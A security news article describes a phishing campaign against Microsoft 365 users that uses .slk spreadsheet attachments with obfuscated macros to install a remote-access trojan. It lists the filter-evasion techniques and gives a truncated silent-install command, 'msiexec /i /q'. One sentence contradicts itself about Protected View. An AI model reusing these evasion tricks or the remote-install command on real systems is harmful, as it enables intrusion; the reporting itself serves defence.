New .slk attachment bypasses Microsoft 365 security, 200 million Microsoft users at risk


200 million Microsoft users at hacking risk from new malicious .slk attachments which easily bypass Microsoft 365 Security

Researchers at Avanan have detected new malicious .slk attachments being sent to Microsoft 365 users that can easily bypass Microsoft 365 security. The new phishing malware puts nearly 200 million Microsoft 365 users at risk.

The Avanan researchers state that cybercriminals send an email with an .slk attachment that contains a malicious macro (MSI exec script) to download and install a remote access trojan (RAT). Earlier the hackers used to target only a few organizations but recently the researchers have noticed a spurt in the attack on Microsoft 365 users. The rise was because of a new attack method used by hackers which can easily bypass both Microsoft 365 default security (EOP) and advanced security (ATP).

The Avanan researchers say that the new method puts almost all Microsoft 365 users at risk from getting infected with malware payload sent through a .slk attachment.

What is .slk file extension?

SLK or “Symbolic Link” file is an old Microsoft spreadsheet format file. It is an open-format alternative to Microsoft’ .xls or .xlsx file extension for Excel spreadsheets. The hackers use these files as .SLK files look like an Excel spreadsheet to the ordinary Microsoft user. Also, SLK files easily bypass the bypass Microsoft 365 security, even for accounts protected with Advanced Threat Protection.

Why are SLK files dangerous?

The SLK files are more dangerous than XLS or XLSX files because Windows “Protected View” does apply to SLK files downloaded from the Internet or from email, Excel does not open them in read-only mode which leaves the Office 365 user vulnerable to payload within the SLK files.

A new campaign using SLK files

The latest SLK campaign is designed to beat the ATP or Advanced Threat Protection feature by Windows. The new phishing campaign uses a number of obfuscation techniques specifically designed to bypass ATP.

  • The attack was sent from hundreds of free Hotmail accounts
  • The macro script includes ‘^’ characters to confuse ATP filters.
  • The URL was split in two so that ATP would not read it as a web link,
  • The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP,
  • The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

The researchers say that the attacks are Microsoft Office 365 specific and Gmail immediately blocks files sent with SLK extensions.

How does the new attack work?

The latest SYLK attack includes an SLK file with an obfuscated macro to run a command on a Windows machine:

msiexec /i /q

This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it is a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.

How do you protect yourself against SLK file malware?

The researchers say that SLK attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer using a topic that is highly specific to the organization and the individual. For example, an email to manufacture will discuss parts specifications, an email to a tech firm ask for changes to a large electronics order while an email to a government department will discuss legal concerns.

The only way to spot an SLK extension malware is to go through the attachments before downloading it. You can also configure your Office 365 account to reject files of this type through settings.


About Author

"The Internet is the first thing that humanity has built that humanity doesn't understand, the largest experiment in anarchy that we have ever had." Eric Schmidt

Notify of
Inline Feedbacks
View all comments